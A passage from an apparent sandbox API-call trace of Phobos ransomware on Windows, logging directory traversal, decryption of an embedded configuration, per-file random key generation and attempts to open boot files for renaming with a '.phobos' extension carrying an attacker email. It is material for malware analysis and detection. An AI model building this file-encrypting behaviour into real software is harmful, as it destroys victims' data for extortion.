hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 0 [0065.448] FindClose (in: hFindFile=0x2ed828 | out: hFindFile=0x2ed828) returned 1 [0065.448] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd97a78 | out: hHeap=0x8c0000) returned 1 [0065.449] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x2c6f600 | out: lpFindFileData=0x2c6f600) returned 1 [0065.449] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x2c6f600 | out: lpFindFileData=0x2c6f600) returned 1 [0065.449] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x2c6f600 | out: lpFindFileData=0x2c6f600) returned 1 [0065.450] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Config.Msi\\*", lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 0x2ed828 [0065.450] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.450] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 0 [0065.450] FindClose (in: hFindFile=0x2ed828 | out: hFindFile=0x2ed828) returned 1 [0065.450] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd97a78 | out: hHeap=0x8c0000) returned 1 [0065.450] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x2c6f600 | out: lpFindFileData=0x2c6f600) returned 1 [0065.450] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Documents and Settings\\*", lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 0xffffffff [0065.451] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd97a78 | out: hHeap=0x8c0000) returned 1 [0065.451] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x2c6f600 | out: lpFindFileData=0x2c6f600) returned 1 [0065.451] FindNextFileW (in: hFindFile=0x2e84c0, lpFindFileData=0x2c6f600 | out: lpFindFileData=0x2c6f600) returned 1 [0065.451] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\*", lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 0x2ed828 [0065.451] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.451] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.452] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\*", lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0x2f3170 [0065.479] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.630] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.631] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2c6ee74 | out: lpFindFileData=0x2c6ee74) returned 0x2efe10 [0065.717] FindNextFileW (in: hFindFile=0x2efe10, lpFindFileData=0x2c6ee74 | out: lpFindFileData=0x2c6ee74) returned 1 [0065.717] FindNextFileW (in: hFindFile=0x2efe10, lpFindFileData=0x2c6ee74 | out: lpFindFileData=0x2c6ee74) returned 1 [0065.717] FindNextFileW (in: hFindFile=0x2efe10, lpFindFileData=0x2c6ee74 | out: lpFindFileData=0x2c6ee74) returned 1 [0065.717] FindNextFileW (in: hFindFile=0x2efe10, lpFindFileData=0x2c6ee74 | out: lpFindFileData=0x2c6ee74) returned 1 [0065.717] FindNextFileW (in: hFindFile=0x2efe10, lpFindFileData=0x2c6ee74 | out: lpFindFileData=0x2c6ee74) returned 1 [0065.718] FindNextFileW (in: hFindFile=0x2efe10, lpFindFileData=0x2c6ee74 | out: lpFindFileData=0x2c6ee74) returned 0 [0065.718] FindClose (in: hFindFile=0x2efe10 | out: hFindFile=0x2efe10) returned 1 [0065.718] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x3320060 | out: hHeap=0x8c0000) returned 1 [0065.718] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.718] FindFirstFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2c6ee74) Thread: id = 57 os_tid = 0xabc [0065.330] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10000) returned 0xda7a80 [0065.330] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10000) returned 0xdb7a88 [0065.331] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x28) returned 0x8c1668 [0065.331] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x110102) returned 0xe30020 [0065.331] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x50) returned 0x8c1538 [0065.331] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x2e5fdb8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e5fe20 | out: phKey=0x2e5fe20*=0x2e8500) returned 1 [0065.331] CryptSetKeyParam (hKey=0x2e8500, dwParam=0x1, pbData=0x2e5fe08, dwFlags=0x0) returned 1 [0065.331] CryptDecrypt (in: hKey=0x2e8500, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1538, pdwDataLen=0x2e5fdd4 | out: pbData=0x8c1538, pdwDataLen=0x2e5fdd4) returned 1 [0065.331] CryptDestroyKey (hKey=0x2e8500) returned 1 [0065.332] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0065.332] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0065.332] Wow64DisableWow64FsRedirection (in: OldValue=0x2e5fe6c | out: OldValue=0x2e5fe6c*=0x0) returned 1 [0065.332] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1538 | out: hHeap=0x8c0000) returned 1 [0065.332] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x2e5fe70 | out: pbBuffer=0x2e5fe70) returned 1 [0065.332] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.332] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x2e5fe70 | out: pbBuffer=0x2e5fe70) returned 1 [0065.332] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf0 [0065.388] GetFileSizeEx (in: hFile=0xf0, lpFileSize=0x2e5fe10 | out: lpFileSize=0x2e5fe10*=0) returned 1 [0065.388] CloseHandle (hObject=0xf0) returned 1 [0065.388] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0065.422] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x2e5fe70 | out: pbBuffer=0x2e5fe70) returned 1 [0065.422] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa0 [0065.422] GetFileSizeEx (in: hFile=0xa0, lpFileSize=0x2e5fe10 | out: lpFileSize=0x2e5fe10*=93248) returned 1 [0065.422] CloseHandle (hObject=0xa0) returned 1 [0065.422] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui")) returned 0x20 [0065.422] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.422] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.422] ResetEvent (hEvent=0xf8) returned 1 [0065.422] SetEvent (hEvent=0xf4) returned 1 [0065.423] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x2e5fe70 | out: pbBuffer=0x2e5fe70) returned 1 [0065.423] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa0 [0065.423] GetFileSizeEx (in: hFile=0xa0, lpFileSize=0x2e5fe10 | out: lpFileSize=0x2e5fe10*=90688) returned 1 [0065.423] CloseHandle (hObject=0xa0) returned 1 [0065.423] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui")) returned 0x20 [0065.423] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.423] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.423] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0065.428] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0065.433] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x2e5fe70 | out: pbBuffer=0x2e5fe70) returned 1 [0065.433] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa0 [0065.433] GetFileSizeEx (in: hFile=0xa0, lpFileSize=0x2e5fe10 | out: lpFileSize=0x2e5fe10*=75344) returned 1 [0065.433] CloseHandle (hObject=0xa0) returned 1 [0065.433] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui")) returned 0x20 [0065.433] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.433] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.433] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x2e5fe70 | out: pbBuffer=0x2e5fe70) returned 1 [0065.434] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa0 [0065.436] GetFileSizeEx (in: hFile=0xa0, lpFileSize=0x2e5fe10 | out: lpFileSize=0x2e5fe10*=485760) returned 1 [0065.436] CloseHandle (hObject=0xa0) returned 1 [0065.436] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe")) returned 0x20 [0065.436] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\memtest.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\memtest.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.436] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.436] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0065.465] ResetEvent (hEvent=0xf8) returned 1 [0065.465] SetEvent (hEvent=0xf4) returned 1 [0065.466] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x2e5fe70 | out: pbBuffer=0x2e5fe70) returned 1 [0065.466] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x108 [0065.466] GetFileSizeEx (in: hFile=0x108, lpFileSize=0x2e5fe10 | out: lpFileSize=0x2e5fe10*=90704) returned 1 [0065.466] CloseHandle (hObject=0x108) returned 1 [0065.466] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui")) returned 0x20 [0065.466] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.466] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.466] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0065.469] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0065.470] ResetEvent (hEvent=0xf8) returned 1 [0065.470] SetEvent (hEvent=0xf4) returned 1 [0065.470] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x2e5fe70 | out: pbBuffer=0x2e5fe70) returned 1 [0065.470] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x108 [0065.470] GetFileSizeEx (in: hFile=0x108, lpFileSize=0x2e5fe10 | out: lpFileSize=0x2e5fe10*=90176) returned 1 [0065.470] CloseHandle (hObject=0x108) returned 1 [0065.470] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui")) returned 0x20 [0065.470] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.470] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.470] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0065.473] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0065.474] ResetEvent (hEvent=0xf8) returned 1 [0065.474] SetEvent (hEvent=0xf4) returned 1 [0065.474] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x2e5fe70 | out: pbBuffer=0x2e5fe70) returned 1 [0065.474] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x108 [0065.474] GetFileSizeEx (in: hFile=0x108, lpFileSize=0x2e5fe10 | out: lpFileSize=0x2e5fe10*=90192) returned 1 [0065.474] CloseHandle (hObject=0x108) returned 1 [0065.474] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui")) returned 0x20 [0065.474] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.474] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.474] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0065.477] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0065.478] ResetEvent (hEvent=0xf8) returned 1 [0065.478] SetEvent (hEvent=0xf4) returned 1 [0065.478] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x2e5fe70 | out: pbBuffer=0x2e5fe70) returned 1 [0065.478] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x108 [0065.478] GetFileSizeEx (in: hFile=0x108, lpFileSize=0x2e5fe10 | out: lpFileSize=0x2e5fe10*=87104) returned 1 [0065.478] CloseHandle (hObject=0x108) returned 1 [0065.478] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui")) returned 0x20 [0065.478] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.479] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.479] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0065.484] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0065.485] ResetEvent (hEvent=0xf8) returned 1 [0065.485] SetEvent (hEvent=0xf4) returned 1 [0065.485] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x2e5fe70 | out: pbBuffer=0x2e5fe70) returned 1 [0065.485] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x108 [0065.486] GetFileSizeEx (in: hFile=0x108, lpFileSize=0x2e5fe10 | out: lpFileSize=0x2e5fe10*=70224) returned 1 [0065.486] CloseHandle (hObject=0x108) returned 1 [0065.486] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui")) returned 0x20 [0065.486] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.486] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.486] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0065.488] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0065.489] ResetEvent (hEvent=0xf8) returned 1 [0065.489] SetEvent (hEvent=0xf4) returned 1 [0065.489] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x2e5fe70 | out: pbBuffer=0x2e5fe70) returned 1 [0065.489] CreateFileW (lpFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0065.593] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2e5fe10 | out: lpFileSize=0x2e5fe10*=383786) returned 1 [0065.593] CloseHandle (hObject=0x148) returned 1 [0065.593] GetFileAttributesW (lpFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr")) returned 0x27 [0065.593] SetFileAttributesW (lpFileName="\\\\?\\C:\\bootmgr", dwFileAttributes=0x26) returned 0 [0065.593] GetFileAttributesW (lpFileName="\\\\?\\C:\\bootmgr.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\bootmgr.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.593] CreateFileW (lpFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.593] SetFileAttributesW (lpFileName="\\\\?\\C:\\bootmgr", dwFileAttributes=0x27) returned 0 [0065.593] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) Thread: id = 58 os_tid = 0xac0 [0065.333] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10000) returned 0xdc7a90 [0065.333] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10000) returned 0xdd7a98 [0065.334] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x28) returned 0x8c1538 [0065.334] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x110102) returned 0x2e60020 [0065.334] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x50) returned 0x8c1568 [0065.334] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x291f878, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x291f8e0 | out: phKey=0x291f8e0*=0x2ed708) returned 1 [0065.334] CryptSetKeyParam (hKey=0x2ed708, dwParam=0x1, pbData=0x291f8c8, dwFlags=0x0) returned 1 [0065.334] CryptDecrypt (in: hKey=0x2ed708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1568, pdwDataLen=0x291f894 | out: pbData=0x8c1568, pdwDataLen=0x291f894) returned 1 [0065.334] CryptDestroyKey (hKey=0x2ed708) returned 1 [0065.334] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0065.334] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0065.334] Wow64DisableWow64FsRedirection (in: OldValue=0x291f92c | out: OldValue=0x291f92c*=0x0) returned 1 [0065.334] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1568 | out: hHeap=0x8c0000) returned 1 [0065.335] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x291f930 | out: pbBuffer=0x291f930) returned 1 [0065.335] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf0 [0065.373] GetFileSizeEx (in: hFile=0xf0, lpFileSize=0x291f8d0 | out: lpFileSize=0x291f8d0*=0) returned 1 [0065.373] CloseHandle (hObject=0xf0) returned 1 [0065.374] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x291f930 | out: pbBuffer=0x291f930) returned 1 [0065.374] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf0 [0065.374] GetFileSizeEx (in: hFile=0xf0, lpFileSize=0x291f8d0 | out: lpFileSize=0x291f8d0*=89168) returned 1 [0065.374] CloseHandle (hObject=0xf0) returned 1 [0065.374] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui")) returned 0x20 [0065.374] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.374] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.375] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x291f930 | out: pbBuffer=0x291f930) returned 1 [0065.375] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf0 [0065.375] GetFileSizeEx 